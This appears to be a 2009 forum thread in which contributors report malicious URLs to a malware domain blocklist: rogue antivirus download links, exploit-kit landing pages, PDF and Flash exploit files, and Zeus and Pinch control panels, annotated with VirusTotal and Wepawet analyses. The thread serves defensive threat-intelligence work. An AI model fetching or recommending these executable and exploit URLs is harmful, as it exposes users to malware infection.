document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";document.write("");
</script>
ends up in
hxxp://www.oiuytr.net/new/a11.css
http://www.virustotal.com/analisis/8ae968467b62acf4b9196cd8f6c287f6
-
-
-
-
epeiy.com/wssl713fro.exe
http://www.virustotal.com/analisis/303be708a68899d8f1bad9591b9b4f89
-
Sites related to Rogue Apps
-
Sites related to Rogue Apps
Added to list.
-
http://www.bm-740.cn/new/new1.exe
..
http://www.bm-740.cn/new/new24.exe
http://www.threatexpert.com/report.aspx?md5=16146737ffcd2c74d7dd9e7881056172
-
more rogue apps related sites
-
more rogue apps related sites
Thank you. Added to list.
-
AV2009 rogue sites: This gang is changing fake/scare scanner sites very frequently >:(
http://bestantivirusdefense.com/2009/1/freescan.php?nu=77001101
http://privatewebsystemupdate.com/download/av_2009glof.exe
-
Spyware Protect 2009 related sites:
-
exploits/trojans
starting at
http://www.44aaaa.com/
redirects to URLs where the css files are trojans
-
-
"XP Protection Center"
braviax/brastk advertised rogue
-
"XP Protection Center"
braviax/brastk advertised rogue
Thanks. Added.
-
I have added many zeus/zbot/wsnpoem urls to list in the last days.
http://www.malwaredomainlist.com/mdl.php?search=zeus%2F&colsearch=All&quantity=50&sort=Date
-
Some pdf exploits
hardmoviesporno.com/rf/exp/update1.pdf
Analysis:
http://wepawet.cs.ucsb.edu/view.php?hash=6e2a9dc53394e4d4f844a91c6e430783&t=1232726861&type=js
http://www.virustotal.com/analisis/ff4c30c4e7bf97019e2595c659191103
hardmoviesporno.com/rf/exp/update2.pdf
Analysis:
http://wepawet.cs.ucsb.edu/view.php?hash=0d64591f2075368ff912ecc5ec7f9cb7&t=1232726875&type=js
http://www.virustotal.com/analisis/6c0c223baa85f44b0342072a51dc3877
-
Rogue pushed through Vxgame Trojan infection
hXXp://antivirusxppro2009.com/cgi-bin/download.pl?code=0000049
antivirusxppro2008.com
-
Rotators
http://diettopseek.cn/in.cgi?cocacola
http://yourliteseek.cn/in.cgi?cocacola
http://litetoplocatesite.cn/in.cgi?cocacola2
http://litepremiumlist.cn/in.cgi?cocacola
http://nanotopfind.cn/in.cgi?cocacola
rotate to
http://murom-hotel.com/system/index.php
http://326g.com/forums/includes/hooks/system/index.php
http://parsrabota.reg36.ru/includes/system/index.php
http://alink.belstom.ru/partners/system/index.php
http://daiwa-cormoran.ru/mods/catalog/acr/system/index.php
http://taraxacum.ru/templates/siteground95/images/system/index.php
http://love-sad.ru/img/system/index.php
http://avtonchik.ru/images/stories/fruit/system/index.php
http://sunucum2.kaliteweb.net/~burctnet/system/index.php
http://ecogroup-vrn.ru/site/i/css/system/index.php
http://demokoksander.nl/recepten/system/index.php
http://2vb.ru/tetisgal/images/system/index.php
Exploits from all sites lead to the same file:
http://www.virustotal.com/analisis/1a10833084a81f73b84c2a40f64d6302 2/35 !!!!
Rogue
http://imunizator.net/
best-online-antivirus-scanner.info/scan.php
best-antivirus-2010-scanner.info/scan.php
best-antivirus-2010-download.info/install.php
antivirus-scanner-online.com/scan.php
-
Rogues
http://antispyknight.biz/files/antispyknight.msi
http://antispyknight.info/files/antispyknight.msi
http://total-defender.com/download/total-defender-setup.exe
-
Rogue Winiguard
94.247.2.173/.dif/go.php?sid=1
Redirectors to LuckySploit
94.247.2.50/.dif/go.php?sid=1
94.247.2.52/.dif/go.php?sid=1
94.247.2.157/.dif/go.php?sid=1
-
already posted ... <modified>
hxxp://www.hoho-3.cn/ gr.exe - Downloader
-
IE Security, new rogue from the IEDefender family.
http://ie-security.com/_download.aspx
http://216.240.151.112/ie.exe
https://secured-software-order.com/iesa2/
-
Related to popups
hxxp://ifengw.com/TT.exe
-
XP Police Antivirus rogue sites: courtesy S!R!
xp-police.com
http://xp-police.com/installed.php?id=dress
http://xp-download-center.com/exe3/dress.exe
-
Sites related to SysAntivirus 2009 rogue application.
sysantivirus2009.com
http://files.sysav-download.com/load/setup_1_1_.exe
http://int.sysreport1.com/stat.php?func=installrun&id=1&landing=1&lang=EN&sub=0
http://dl.sysav-storage.com/get/?type=main&pin=1&lnd=1
http://int.sysreport2.com/stat.php?func=ok
http://int.sysreport1.com/dom1.php
http://sales.buysysantivirus2009.com/pay/MQ==_MA==_RTA5MDUwNzk=/1/
-
Sites related to System Guard 2009 rogue application.
dlsg09.com
dlsgd3.com
getsysgd09.com
sg12scanner.com
sg9scanner.com
systemguard2009.com
systemguard2009m.com
-
Scam sites involved in distributing "Antivirus 2009" Rogue security application
http://internetinterestingplaces.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://pleaseclickhere.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://anti-malware-scanner.com/promo/1/freescan.php?nu=880479
http://antimalware-scanner.com/promo/1/freescan.php?nu=880182
-
hxxp://elkonline.pl/images/eventlist/venues/small/system
http://wepawet.cs.ucsb.edu/view.php?hash=b6f6603d951fdcdf047cc3815498ac94&t=1233950001&type=js
-
toppharma.net/123/sorted/pr/system
pixion.nl//foto/gallery/lente/images/system
http://wepawet.cs.ucsb.edu/view.php?hash=a247ae9bf05e543a750c686e75f3455b&t=1234013661&type=js
medamphetamin.cn/fffxxx3/
http://wepawet.cs.ucsb.edu/view.php?hash=ea313d55e625a0d576848943a6165b9f&t=1234038737&type=js
-
Sites involved in distributing Rogue Security applications
System-tuner.com
Systemsecurityse.com
Electronicbillinghost.com
Securesoftwarepays.com
Xpyburner.com
Xpyburnerpro.com
Hdrivesweeper.com
Hdrivesweeperpro.com
antispyware3000.net
Antivirus2009plus.com
rapidantivirus-09.com
rapid-antivirus-2009.com
rapidantivirus-2009.com
rapid-antivir2009.com
rapidantivirus2009.com
rapidantivirus09.com
extraantivir.com
ie-security-config.com
virus-doctor.com
-
http://xapaxapa.ru/todance1/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=e61e2bc83427a3c841a6ff970b76e249&t=1234120297&type=js
-
Antivirus 2009 related sites..
http://laspaceevents.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://malwareprosecurityscanner.com/promo/1/freescan.php?nu=880182&back==TQw1TD3NEMMMI=O
http://malwareprosecurityscan.com/promo/1/freescan.php?nu=880553&back==zQ02jD3NEMMMI=M
-
Rogues
xpvirusprotection.com
totalmalwareprotection.com
totalvirusprotection.com
Xpvirusprotection2009.com
malware-doc.com
-
av1-download.info
av1-site.info
http://downloads.anti-virus-2010.info/en/exe/StageThree.exe
http://downloads.anti-virus-2010.info/en/exe/StageTwo.exe
http://downloads.anti-virus-2010.info/en/exe/svchost.exe
http://downloads.anti-virus-2010.info/en/exe/QWProtect.dll
-
http://antivirus1-site.info/install.php
http://antivirus1-download.info/en/exe/install.exe
-
www.luckffxi.com
http://wepawet.cs.ucsb.edu/view.php?hash=8e2190d1410d684b1b814a39b62288bb&t=1235188110&type=js
web.114baines.com/1/index.htm
http://wepawet.cs.ucsb.edu/view.php?hash=71c5258f6e3d469fabbe0eb372636e40&t=1235188376&type=js
www.hynno8744.cn/1/index.htm
http://wepawet.cs.ucsb.edu/view.php?hash=dd7e0777ff2996e20f947903e874c8b0&t=1235188509&type=js
down.114anhui.com/1/index.htm
http://wepawet.cs.ucsb.edu/view.php?hash=d912a96fa590ecfad9a77d60ca4fbcb8&t=1235189761&type=js
www.ffxionlion.com/download/ffxi.exe
http://www.virustotal.com/analisis/4e769eda073397abb033c663022d1ad4
www.ffxionlion.com/download/wow.exe
http://www.virustotal.com/analisis/5f1fb36b313ecea141a217e086fe02b9
www.ffxionlion.com/download/mj.exe
http://www.virustotal.com/analisis/42ec3ff4dcc6e56fa05951228b43de41
-
reddii.ru/traffic/sploit1/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=98857f2f00af684e185cdc1c165030a2&type=js
-
xp-police-antivirus.com
Xp-police-2009.com
Xp-police-av.com
Xp-police-engine.com
xp-police-09.com
http://files.msdownloadsav.com/codec/codec_200002.exe
http://dl.msantivirstorage.com/get/?pin=200002&lnd=-1&type=main
http://int.ms-asreport1.com/dom1.php
-
hxxp://cccbbbb.cn/1/rr.htm
http://wepawet.cs.ucsb.edu/view.php?hash=a4d9fe888d4104e456afe2dd8df1367e&t=1235400090&type=js
-
http://stabilityinternetworld.com/download.php?affid=00000
http://stabilityinternetworld.com/install/installpv.exe
http://scanstabilityonline.com/download.php?affid=08100
-
A few Pinches...
hxxp://avto-mashine.freehostia.com/
hxxp://likrion.ho.ua/1.php
hxxp://maxi163.far.ru/maxi/maxi.php
hxxp://rus-shop.info/gate.php
hxxp://test.bboys.tu2.ru/gate.php
hxxp://thelogofpinch.freehostia.com/gate/gate.php
hxxp://www.cybertm.tu1.ru/admin/admin.php
hxxp://www.patr0n87.tu2.ru/reports/gate.php
hxxp://www.teploplast-nn.ru/admin/admin.php
hxxp://www.tihvin.tu2.ru/italy/gate.php
hxxp://ykosty.freehostia.com/gate/
-
ultradant.cn/dis9/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=bd77359c919df7385285588e2409df84&t=1235675351&type=js
http://www.virustotal.com/analisis/8222b3a4b72a2b49f689099ff81406b6 14/39
http://divinets.cn/z/5.htm
contains encoded iframes
211.95.79.58/y/index.php
many exploits
http://wepawet.cs.ucsb.edu/view.php?hash=5648ff6fc1ba1b43bcf2d7abc6770be4&t=1235473451&type=js
dvcd.info/evo/count.php?o=2
flash exploit dvcd.info/evo/exploits/x19.php?o=2&t=1235675434&i=1081047572
pdf exploit dvcd.info/evo/exploits/x18.php?o=2&t=1235675434&i=1081047572
exe dvcd.info/evo/getexe.exe?o=2&t=1235675434&i=1081047572&e=18
flash http://wepawet.cs.ucsb.edu/view.php?hash=c99916c1ad66815a48271f48f8e2db7a&type=swf
pdf http://wepawet.cs.ucsb.edu/view.php?hash=4d136b35fb9c3c50f1a7216b40bed9ed&t=1235677319&type=js
exe http://www.virustotal.com/analisis/3c3290226366784976aeb0c69f9c1517 21/39
prororo7.net/sp/index.php
prororo7.net/sp/s/f.pdf
http://wepawet.cs.ucsb.edu/view.php?hash=400499d9ab35a63f39552b25f9e04fbd&t=1235678776&type=js
http://www.virustotal.com/analisis/5b9a8bb60a602e71ea377e51ced56aaa 27/39
toureg-cwo.ch/fta/index.php
exploits/zbot
http://wepawet.cs.ucsb.edu/view.php?hash=66bab88192d8490d32e5c60a30231555&t=1235679132&type=js
http://www.virustotal.com/analisis/24b84a42c57c90a1a9dc69c8ae91dd1d 9/38
gavai-pegc9.ws/bI/index.php
exploits, redirects to toureg-cwo.ch
-
findrosain.ru/find/
http://wepawet.cs.ucsb.edu/view.php?hash=3c0b4261f5467c208d1c8bd07a2e9a0f&t=1235747603&type=js
findrosain.ru/love
http://wepawet.cs.ucsb.edu/view.php?hash=b2636ac6565fdc94e9e2a19cf46941d7&t=1235833030&type=js
-
Av2009 and Av360 Throwaway sites
http://thebestworldparty.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://proantimalwarescan.com/promo/1/freescan.php?nu=880479&back==
http://spaceindustrial.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://prosystemonlinescanner.com/promo/1/freescan.php?nu=880182&back==
http://worldcommercialbusiness.cn/soft.php?aid=0553&d=1&refer=d58bf6d15
http://pro-antimalware-scanner.com/promo/1/freescan.php?nu=880553&back==
-
Exploits/trojan
breakingnews.usnewnews.com/liveinternet.js
breakingnews.usnewnews.com/fresh/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=7ebea0ac579a5d9ca9e3156a662749e8&t=1235819223&type=js
http://www.virustotal.com/analisis/8eb587635d3bad9d37b9a5e7b06d2389
-
an92.net/myy/index.php
pdf exploits
an92.net/myy/firefox.pdf
http://www.virustotal.com/analisis/3089407073a361a9f3091e57ffbe3c99 16/39
MD5...: 61ac62ef2879e4ce1682f730f2015f09
http://wepawet.cs.ucsb.edu/view.php?hash=5eb164252fc11870b11a94b37f3f4394&t=1235921432&type=js
an92.net/myy/firefox2.pdf
http://www.virustotal.com/analisis/574194324cf37f372fb6fba43c282458 14/38
MD5...: 24ca3bb5e3843ad86fb8302f97cc709a
http://wepawet.cs.ucsb.edu/view.php?hash=742f6815506fe5158de1caf392d33025&t=1235921582&type=js
payload
an92.net/myy/load.php?xpl=pdf&browser=Firefox
http://www.virustotal.com/analisis/0e6347a92768298244d2a1969bc70fd4 4/39
MD5...: c0e86259278d8e3dba3fe346866022da
http://www.threatexpert.com/report.aspx?md5=c0e86259278d8e3dba3fe346866022da
requests
bucefal.org.ua/bro/ld.php?v=1&rs=76487-337-8429955-226141824245000&n=1&uid=1
Emo-loader
-
pdf exploit
www.kuplon.biz/smun/pdf.php?id=2435&vis=1
http://www.virustotal.com/analisis/47e606a0b63ebf3bcf819440f0da1441 13/39
MD5...: f1e5aa71ff2f65a7cf553ee011e2632c
http://wepawet.cs.ucsb.edu/view.php?hash=f66f78791092123d5e7989f47b548aa8&t=1235925405&type=js
payload
http://www.kuplon.biz/smun/load.php?id=2435&spl=69
http://www.virustotal.com/analisis/c90c5ce9e2386722d6c21b38e5888c76 3/39
MD5: b0acf2f559db5d993ff720a74febdc83
-
pdf exploit
www.geodll.biz/ar/spl/pdf.pdf
setcontrol.biz/ar/spl/pdf.pdf
http://www.virustotal.com/analisis/36622b4ff10e0293f3ed1b8e724d8a7c 6/39
MD5...: 647da8d2ee1213926331077babafb8e4
http://wepawet.cs.ucsb.edu/view.php?hash=a36fd77906ead994adcb7256c8be4a8c&t=1235928293&type=js
payload
geodll.biz/ar/exe.php
http://www.virustotal.com/analisis/fb7fc693aa7b63865d25628f17b4bb0c 11/38
MD5...: e8034060f4e05f9e461faf7e139f2f5d
-
vsedlysna.ru/img/site/2/?viagra
http://wepawet.cs.ucsb.edu/view.php?hash=b0807cd3d6f0c516fbd64a54e58ff0d2&t=1236073833&type=js
http://www.virustotal.com/analisis/9ff9a32c276bbcd97b2119a79312bce2
-
Malware Defender 2009 rogue related sites:
http://easywinscanner17.com/sysgd09_2/3/10284
MalwareDefender2009.com
http://gomaldef09.com/buy.html?track_id=10001&bill_id=0
http://89.149.251.181/maldef09/install.php?track_id=10284
http://89.149.251.181/maldef09/setup.php?track_id=10001
http://78.159.99.58/maldef09/install.php?track_id=10511
-
Av360 Throwaway sites contd...
http://whereismat.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://falloutneferwin.cn/soft.php?aid=0468&d=5&refer=bb916128e
http://whreismyplugnplay.cn/soft.php?aid=0560&d=1&refer=b8ced57fa
http://softwareoverworld.cn/soft.php?aid=0553&d=1&refer=d58bf6d15
http://fastantimalwarescan.com/promo/1/freescan.php?nu=880553&back==jQ20zj0NIMNMI=M
http://fast-antimalware-scanner.com/promo/1/freescan.php?nu=880182&back==DQ52zj0NIMMMI=M
http://fast-antimalware-scan.com/promo/1/freescan.php?nu=880468&back==zQ01Dj0NIMNMI=M
-
Advancesoftpc.com
Antispywarepro.net
scanspywareonline.net
Pcspeed-up.com
http://www.netspywarescan.com/online-scan.html?ewmid=225
-
http://easywinscanner17.com/maldef09_1/4/10242
http://fastantimalwarescan.com/promo/1/freescan.php?nu=880017&back=%3DTQ55jj2NAMNMI%3DO
-
Av360 Throwaway sites contd...
http://advertisechoice.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://vivaldinaruto.cn/soft.php?aid=1001&d=1&refer=184b911aa
http://awardspacelooksbig.cn/soft.php?aid=0468&d=5&refer=bb916128e
http://bestantimalwarescanner.com/promo/1/freescan.php?nu=880182&back==DQw3zj4NcMMMI=O
http://bestantimalwarelivescan.com/promo/1/freescan.php?nu=880468&back==TQ0xzj4NcMMMI=M
http://online-antimalware-scanner.com/promo/1/freescan.php?nu=881001&back==DQywDj3NAMNMI=O
ANG AntiVirus 09 rogue related
Angantivirus-2009.com
Angantivirus2009.com
-
Av360 Throwaway sites contd...
trustedpaymentsystem.com
antivirus360-protection.com
liveantivirusscanner.com
-
exploits/zbot
4you.vippif.com
http://wepawet.cs.ucsb.edu/view.php?hash=f73ece587f4d906b256f108bbdb486c9&t=1236954537&type=js
-
hxxp://213.155.10.56/exe2/3913960.exe
hxxp://213.163.65.9/codec/140.exe
hxxp://asiametal.biz/tds/in.php
hxxp://dbs-softportal.com/viewtubesoftware.40016.exe
hxxp://fullantispywarescanner.com/promo/download/trial/InstallAVg_880899.exe
hxxp://heur.net63.net
hxxp://hothotvideo.com/install.php?uid=9c0baa17cab48c54e8a6d01b47ff1fb7
hxxp://likrion.ho.ua
hxxp://loyaltube.com/tube/?id=140
hxxp://mtwproductions.com.au/gate/
hxxp://porno-tube-x.com/l/berror/id/3913960/
hxxp://rusrm.com/z/cfg.bin
hxxp://streamingtubes2009.com/xplaymovie.php?id=40016
hxxp://viagra-generic-cialis-daily.com
hxxp://video-go.net/go/go.php?sid=1
hxxp://www.globalvisionobdr.com/gate/
hxxp://www.karinya.net.au
hxxp://xbalamquetulum.com
-
Rogue related
http://checkclick-site.info/install.php
http://checkclick-download.info/en/PE/install.exe
http://virusdoctor-pro.com/downloads/?uid=7&l=69
http://pay-virusdoctor.com/lo/5/index.php?
Virusmelt.com
Virusmeltpro.com
http://payvirusmelt.com/lo/5/index.php?
http://updvms.net/update.exe
http://updvms.cn/update.exe
http://updvms.net/Rpdm.exe
http://updvms.cn/Rpdm.exe
-
hxxp://nuclear777.com/1.1.0.0/
hxxp://videoblog.kilu.de/
hxxp://1.114central.com/17/02.htm
hxxp://1.114central.com/4/02.htm
hxxp://baidusib.cn/01/ytxxz.htm
hxxp://baidusib.cn/05/ytxxz.htm
hxxp://baidusib.cn/06/ytxxz.htm
hxxp://www.hynno8744.cn/13/02.htm
hxxp://www.hynno8744.cn/17/02.htm
hxxp://www.hynno8744.cn/18/02.htm
hxxp://www.hynno8744.cn/20/02.htm
hxxp://www.hynno8744.cn/21/02.htm
hxxp://www.hynno8744.cn/22/02.htm
hxxp://www.hynno8744.cn/23/02.htm
hxxp://www.hynno8744.cn/26/02.htm
hxxp://www.hynno8744.cn/29/02.htm
hxxp://www.hynno8744.cn/31/02.htm
-
hxxp://94.247.3.147/rot/xc01/index.php
hxxp://94.247.3.147/wpa/dog/index.php
hxxp://91.207.4.122/spm/s_alive.php?id=816050030546&tick=3910437&ver=500&smtp=
hxxp://91.207.4.122/spm/s_alive.php?id=663551200501&tick=423109&ver=202&smtp=b
hxxp://91.207.4.122/spm/s_alive.php?id=355751445710&tick=27198703&ver=202&smtp
hxxp://91.207.4.122/spm/s_alive.php?id=522056062568&tick=24860734&ver=500&smtp
hxxp://91.207.4.122/spm/s_alive.php?id=605657882560&tick=1229828&ver=201&smtp=
hxxp://91.207.4.122/spm/s_alive.php?id=255660652365&tick=228672609&ver=224&smt
There used to exist in public view "91.207.4.122/status", but now he/she's "fixed" that, redirecting to cn.yahoo.com.
Google still has the cache page though:
http://74.125.77.132/search?q=cache:4eUiegnhAFgJ:91.207.4.122/status+91.207.4.122
-
LeFiesta Exploit
http://89.248.172.156/660/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=bce9710a8cfc8452ff64a0916ebf54a4&t=1234723683&type=js
http://biglendlive.info/hitstat/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=2d3e1eab37b1bf8225cccc6e808f0912&t=1236937612&type=js
http://lafi.babjr.cn/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=96051f135ea17fc81786f21d8f6315d5&t=1235407081&type=js
http://leepe.cn/cat/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=cf10ba345d696fb6b4b19704eeee4866&t=1236765069&type=js
http://leepe.cn/eng/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=c866c23b22cf6c8e8f993623c5060d9e&t=1237200054&type=js
http://piratik.biz/exp/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=7fba86140376a1fc3e6fa8a4e05612bf&t=1235415814&type=js
http://piratik.biz/exp5/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=2aa87c66d9d626cec6793fe1cd2d75e9&t=1235415776&type=js
http://thelegion74.com/yu5/index.php
http://vippif.com/fiesta/
http://wepawet.cs.ucsb.edu/view.php?hash=a1efe8f6cb881a9fd88991f4a4b25d1f&t=1237200606&type=js
http://weblife.net23.net/
http://wepawet.cs.ucsb.edu/view.php?hash=49ecb0704f81a59636e18607087534a1&t=1237201220&type=js
http://www.thebestlog.org/cruz/
http://wepawet.cs.ucsb.edu/view.php?hash=b44dd93b6aebad5b6b6d7eec57926621&t=1234633908&type=js
-
Koobface
http://viewworldh.com/download/1/1000/5
http://viewworldy.com/download/1/1000/5
http://ldj5.biz/setup.exe
MBR Rootkit / Sinowal / Mebroot, new IP 76.76.22.221
http://akajjcthr.com/ld/ment/
-
http://1zs0ewvqcget52rl1z1n.cn/s_t_t.php
http://2d2deozghamea1m1ifn3.cn/s_t_t.php
http://dcz9ubei212vp3nrca5i.cn/s_t_t.php
http://ddvrrflabpqcuoaexpwp.cn/s_t_t.php
http://dihbgbwqryuolfbebgme.cn/s_t_t.php
http://egntxselsaossawilurx.cn/s_t_t.php
http://fcsvjiajnerwjjmtnfzu.cn/s_t_t.php
http://hsyzpbavkojdqclhnoqz.cn/s_t_t.php
http://ivdqvmbxktixdpleamjg.cn/s_t_t.php
http://jetvokzbdgktxubiiphn.cn/s_t_t.php
http://lmempodfzrqqkteyupar.cn/s_t_t.php
http://lufwhtelkadvrtaukqjo.cn/s_t_t.php
http://qjiv7qj4irh2f1o2v8sm.cn/s_t_t.php
http://tckeblkiumuhysrwqlev.cn/s_t_t.php
http://xbfnyukgdoqrjrsfmcdm.cn/s_t_t.php
http://xpehbam.cn/s_t_t.php
http://zjjrrhhuokjxgmulisxs.cn/s_t_t.php
http://znchygdrmelzejjvofji.cn/s_t_t.php
http://zteersxhgcddtfktecrq.cn/s_t_t.php
http://wepawet.iseclab.org/view.php?hash=de7f0c270430a281f48625fee7166324&t=1237203611&type=js
http://234954382524.cn
http://wepawet.iseclab.org/view.php?hash=d37fb9bbc20226eb605422b627e757ed&t=1237203979&type=js
http://438723847234.cn/sem/index.php
http://wepawet.iseclab.org/view.php?hash=de4915ce6ed63b2670e6c810ecdd2017&t=1237204176&type=js
http://adscounter.cn/package/
http://wepawet.iseclab.org/view.php?hash=77c3b2fc8a4cc7cbf7fcdf32d0c16119&t=1237204323&type=js
http://s1.s2.s3.s4.yahoo.com.longebook.cn/qq/
http://wepawet.iseclab.org/view.php?hash=26e6cf1dc8e2ab9be7e3172208dfcb92&t=1237205518&type=js
http://foxbelive.ru/pic1/
http://foxxpriv.ru/pic1/
http://wepawet.iseclab.org/view.php?hash=36da7ee709e19b965a17a4d88306ce00&t=1237205612&type=js
http://g00gle-analyze.com/slg2/
http://wepawet.iseclab.org/view.php?hash=a8ce4d33e27b67f88cfb7ed4fe845b56&t=1237050231&type=js
http://hunters-of-darkness.de/cgi-stat/index.php
http://wepawet.iseclab.org/view.php?hash=3b376c010ae0fbc67f6edd14fa48375a&t=1237206013&type=js
http://jimmgoland.1sthost.org/filter/
http://wepawet.iseclab.org/view.php?hash=59e48910a0e080084083b3ee824ef055&t=1237206179&type=js
http://ncsmichigan.com/images/pack/index.php
http://wepawet.iseclab.org/view.php?hash=3525a035f08a9dbffd6b63f448f285b0&t=1237206521&type=js
http://telenet.kz/kabel/cer/
http://wepawet.iseclab.org/view.php?hash=33f5575880f59efb8f70e53668da2610&t=1237207441&type=js
http://chriscleaningco.com/images/
http://gifts2009.net/aga/in.php
http://gold-sutra.info/gpack/
http://php4php.xtreemhost.com/admin/
http://prostolab.net/inf/index.php
http://russiannews.ru/arabic/data/news/upload/exp/
http://e.caricare.net/e/count.php?b=1004
http://e.caricare.net/e/ii.php?b=1004
-
FakeAV / TDSS
user4scan.com/download/install.php
http://wepawet.iseclab.org/view.php?hash=754d4813959d15ce5863681399b81592&t=1237085096&type=js
http://www.virustotal.com/analisis/78ce7b57f666f2530e83d9301b5341c8
-
Thanks guys,
I'm happy to see contributing members. Keep up the good work !
-
Rogue sites:
Spyware Fighter/Spy Fighter related sites
Spw-fighter.com
Spwfighter.com
Spyware-fighter.com
Spw-fight.com
Spywarefighter2009.com
Spwfight.com
Spywarefighter2k9.com
Spywarekick.com
Spywaresfighter.com
Spyfighter.biz
Spyfighter.org
http://spw-fight.com/in/4/1/1/0000000000000000
http://download.spw-fight.com/?user_id=0&sub_id=0&hash=0000000000000000
http://spwfght.com/download2.php?user=4&subid=32
http://spwfighter.com/dl/download2.php?user=4&subid=32
http://spyfighter.org/Installer.exe
-
Rogue related
http://renus2008.com/renus.exe
1-renus2008.com
3-antispyware3000.net
-
Rogue related too
go-uniq.com/in.cgi?13&gai=cspamg&gli=79
rotates to
removespywarethreats.com
desktoprepairpackage.com
pcantimalwaresolution.com
Some more on the same IPs
malwareremovingtool.com
securecleanertool.com
cleanerpcsolution.com
-
http://agixo.cn/eng/index.php
http://agixo.cn/eng2/index.php
http://wepawet.iseclab.org/view.php?hash=8fe49cd0c89b388f76e9d3fc8d09ab6e&t=1237372107&type=js
http://aindu.cn/zz/index.php
http://wepawet.iseclab.org/view.php?hash=8bc9c4bf1530e2d953ae654caa8c2e77&t=1237372187&type=js
http://leepe.cn/eng2/index.php
http://agixo.cn/eng/index.php
http://agixo.cn/eng2/index.php
http://newsantimalware.com/720/
http://wepawet.iseclab.org/view.php?hash=fc40a6bb199d5c60ad8d42306e6e4756&t=1237372628&type=js
http://bdsm-movies.info/33/
http://wepawet.iseclab.org/view.php?hash=4397096bea5727c9b5b32d76b6eadbd2&t=1237372653&type=js
http://91.207.61.32/la/index.php
http://91.207.61.32/fies/index.php
http://wepawet.iseclab.org/view.php?hash=f2931444df46c8d9443abcb446b6eb8b&t=1237232079&type=js
-
Zbot IP that is on the MDL, but with different directories/drop now.
http://92.62.101.61/ready/farma.exe
http://92.62.101.61/ready/data.cab
http://92.62.101.61/ready/s192.php
-
another one:
http://vse-buddet-zae.biz/daite_deneg/X/ldr.exe
http://vse-buddet-zae.biz/daite_deneg/X/config.bin
http://vse-buddet-zae.biz/daite_deneg/X/snd.php
-
http://us18.ru/@/include/spl.php
leads to:
http://us18.ru/@/load.php
-
tw.lovechina.tw.cn/count/js/gif.gif
redirects to
cqfywg.cn/count/js/swf2.htm
cqfywg.cn/count/js/old.htm
cqfywg.cn/count/js/swfobject.js
cqfywg.cn/count/js/office.htm
cqfywg.cn/count/js/06014.htm
cqfywg.cn/count/js/92.htm
http://wepawet.iseclab.org/view.php?hash=e580167b34c4d2dd3e9dbaf8be2ca752&t=1237459572&type=js
http://wepawet.iseclab.org/view.php?hash=33298d136ed48b61bab20799d076f177&t=1237459770&type=js
-
Full file list on the server with sploits:
06014.htm
92.htm
gif.gif.htm
lz.htm
lz2.htm
office.htm
old.htm
real.gif
real2.htm
sina.htm
swf.htm
swf2.htm
swfobject.js
tj.htm
UU.htm
-
Rogue
http://mostpopularscan.com/
http://fullantispywareonlinescane.com/
http://fullantispywareonlinescane.com/promo/download/trial/InstallAVg_444.exe
http://filefixpro.com
http://free-web-scaners.com/disk/?code=286
-
Rogue related sites:
webscannertools.com
central-scan.com/full.exe
Fullantispywareonlinescane.com
antispywareupdateservice.com/download/security.bmp
platinumsecurityupdate.com/tsc/winsource.dll
thankyouforinstall.cn/order_xp.php?ver=444
powerfullantivirusproduct.com/order_av.php?ver=444
-
asionigolo.com/stats.php?id=21946398
leonads.com/stats-xp/1/
redirect to
84654321.cn/index.php
http://wepawet.iseclab.org/view.php?hash=a9f579db0d42f30653ad3c7470164cdb&t=1237539274&type=js
-
hxxp://sadcwed.hostindianet.com/cache/readme.pdf
Result: 3/39 (7.7%):
http://www.virustotal.com/analisis/e0bbd1fd0710e2d670f8fb2fad822dc6
hxxp://sadcwed.hostindianet.com/cache/flash.swf
Result: 1/39 (2.57%)
http://www.virustotal.com/analisis/040394b274ccb44c3188719fd77448c8
-
hxxp://sadcwed.hostindianet.com/cache/readme.pdf
perfectnamestore.cn/in.cgi?income4
namebuyline.cn/in.cgi?income2
redirect you to this site. Some days ago they led to LuckySploit, today they lead to these exploits.
-
nuevas-videpostales.serveftp.net/retrieve/verpostal/ActiveX-Installer.exe
http://www.virustotal.com/analisis/a81a097348e41b3b8e27f79ed612812a 9/39
MD5...: 35414bbe4473ee111f54f5369da4a453
a-squared 4.0.0.101 2009.03.20 P2P-Worm.Win32.Palevo!IK
BitDefender 7.2 2009.03.20 Worm.P2P.Agent.Q
GData 19 2009.03.20 Worm.P2P.Agent.Q
Ikarus T3.1.1.48.0 2009.03.20 P2P-Worm.Win32.Palevo
McAfee+Artemis 5558 2009.03.19 Generic!Artemis
Microsoft 1.4502 2009.03.20 Worm:Win32/Silly_P2P.G
Prevx1 V2 2009.03.20 High Risk Cloaked Malware
Sophos 4.39.0 2009.03.20 Sus/Autorun-E
Symantec 1.4.4.12 2009.03.20 W32.SillyFDC
-
m.ef44ee.cn/a2/google.htm
http://wepawet.cs.ucsb.edu/view.php?hash=186377db538ece3350e1a6a5e8089c5c&t=1237563886&type=js
-
...redirect you to this site. Some days ago they led to LuckySploit, today they lead to these exploits.
There's more than one malware domain on the same IP... here's another one, for example:
hxxp://ghrgt.hostindianet.com
My guess is they'll continue registering domains on it every once in a while...
http://www.robtex.com/ip/94.247.3.151.html
Edit: Seems like the whole of 94.247.0.0/22 should be monitored for possible "updates", heh...
-
Edit: Seems like the whole of 94.247.0.0/22 should be monitored for possible "updates", heh...
Oh yes.
http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.151#result
-
:)
I like it when they make it easy for us...
http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.150#result
http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.152#result
-
